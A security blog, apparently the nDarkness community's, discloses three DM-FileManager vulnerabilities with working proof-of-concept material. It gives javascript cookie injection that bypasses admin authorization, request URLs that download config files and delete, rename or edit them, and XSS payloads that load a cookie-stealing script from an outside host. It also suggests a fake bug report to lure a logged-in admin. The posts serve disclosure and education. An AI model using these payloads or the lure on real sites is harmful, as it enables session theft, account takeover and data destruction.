28
Aug
2010
DM-Filemanager 3.9.6-9 Multiple Vulnerabilities
The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.
During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.
The next major issues we found with DM-Filemanager version 3.9.6 – 3.9.7-9* dealt with several vulnerabilities. Below is the method used to exploit this vulnerability and a list of possible exploits. Please be aware that this has since been fixed and is no longer vulnerable.
I discovered that direct calls to ajax.php, code.php and rich.php are not properly validated. Possible exploits for this vulnerability are file disclosure, loss of data and sensitive information, XSS (via source code editing), session hijacking (via XSS), web site defacement and database manipulation/exposure.
*You must use:
javascript:void(document.cookie="USER=someadminuser"); void(document.cookie="USERID=50");void(document.cookie="GROUP=ADMINISTRATORS"); void(document.cookie="GROUPID=1");
Create a new file (see edit below for an easier method):
http://localhost/dm-filemanager/ajax.php?newfile=yes&filename=index.php
Download files:
http://localhost/dm-filemanager/?download=yes&file=settings.php&currdir=/dm-filemanager/
Rename:
http://localhost/dm-filemanager/ajax.php?file=index.shtml&currdir=/&destination=/&rn=yes&newname=index.html
Copy:
http://localhost/dm-filemanager/ajax.php?file=config.php&currdir=/&destination=/&cp=yes
Edit: (This one has potential 
)
http://localhost/dm-filemanager/code.php?editfile=yes&file=exploit.php&currdir=/
Delete File:
http://localhost/dm-filemanager/ajax.php?delete=yes&file=index.php&currdir=/wp/&destination=/wp/
Delete Folders:
http://localhost/dm-filemanager/ajax.php?currdir=/wp/&rmdir=yes&folder=/wp/wp-admin&dir=wp-admin
All DM-Filemanager users are strongly encouraged to upgrade their software to the latest version.
GHTime Code(s): f73e1
30
Jan
2010
DM-FileManager 3.9.9 XSS Vulnerability
The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.
During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.
DM-FileManager 3.9.9 and below is vulnerable to XSS via the message variable not being properly sanitized.
This example shows nDarkness.com in an iframe within the login page:
http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<p align=center><iframe src=http://ndarkness.com width=100% height=800></iframe></p>
Here is a url encoded version:
http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=%3C%70%20%61%6C%69%67%6E%3D%63%65%6E%74%65%72%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%20%77%69%64%74%68%3D%31%30%30%25%20%68%65%69%67%68%74%3D%38%30%30%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E
and one step farther is the cookie stealer script:
http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<SCRIPT SRC=http://blog.ndarkness.com/get-cookie.js></SCRIPT>
Here is a url encoded version:
http://localhost/~safety/dm-filemanager/login.php?message=%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%62%6C%6F%67%2E%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%2F%67%65%74%2D%63%6F%6F%6B%69%65%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E
A common exploit for this would be to make up a bug report and alert the site owner of the situation in the hopes that they were logged in when they clicked the link above. The next step would be to use session hijacking to steal the user’s session.
Another option is to call the delete folder ajax.php command and let the user delete directories off of their site.
http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=http://localhost/~safety/dm-filemanager/ajax.php?currdir=/safety/Sites/wp/&rmdir=yes&folder=/safety/Sites/wp/wp-admin&dir=wp-admin
DM-Filemanager users should not follow untrusted links and should upgrade to the latest version.
GHTime Code(s): 262b5 e4f3d f515c nc
9
Dec
2009
DM-FileManager 3.9.6 Cookie Injection and Authorization Bypass Vulnerability
The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.
During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.
The first major issue we found was with DM-Albums version 2.0. After reviewing this software and helping to add greater support for WPMU installations, we moved on to DM-FileManager version 3.9.6. The fist major issue we found with this software prompted us to take a deeper look at the authorization model used by this file manager software. Below is the vulnerable code and the method used to exploit it. Please be aware that this has since been fixed and is no longer vulnerable.
I discovered that cookie variables were being used to determine a users ability to access certain features of the software. The cookies I found that mattered were:
GROUP=ADMINISTRATORS; GROUPID=1;
The group id cookie gives you the admin.php button (footer.php, line 49) – Not necessary but it was a start.
if($GROUPID == 1)
{
print(" <a href=\"admin.php\" class=\"admin\"><img src=\"ui/$USERINTERFACE/png/admin.png\" border=\"0\" height=\"15\"/></a> ");
}
Being in the administrator group (admin.php, line 116) lets you use the admin.php page.
if($GROUP != "ADMINISTRATORS") redirect("/?currdir=$currdir");
To exploit this we used javascript injection. From the log in page I entered the following in the address bar and reloaded the page:
javascript:void(document.cookie="GROUP=ADMINISTRATORS");void(document.cookie="GROUPID=1");
When the page reloaded, the admin button was in the footer of the page and it allowed me to use the admin.php page. Once in the admin interface you have full control of the file manager software and can for example, change the admins email address to yours and use the forgot password feature to receive the admins unencrypted password (more on this issue in future posts).
All DM-FileManager users are strongly encouraged to upgrade their software to the latest version.
GHTime Code(s): b0b5f nc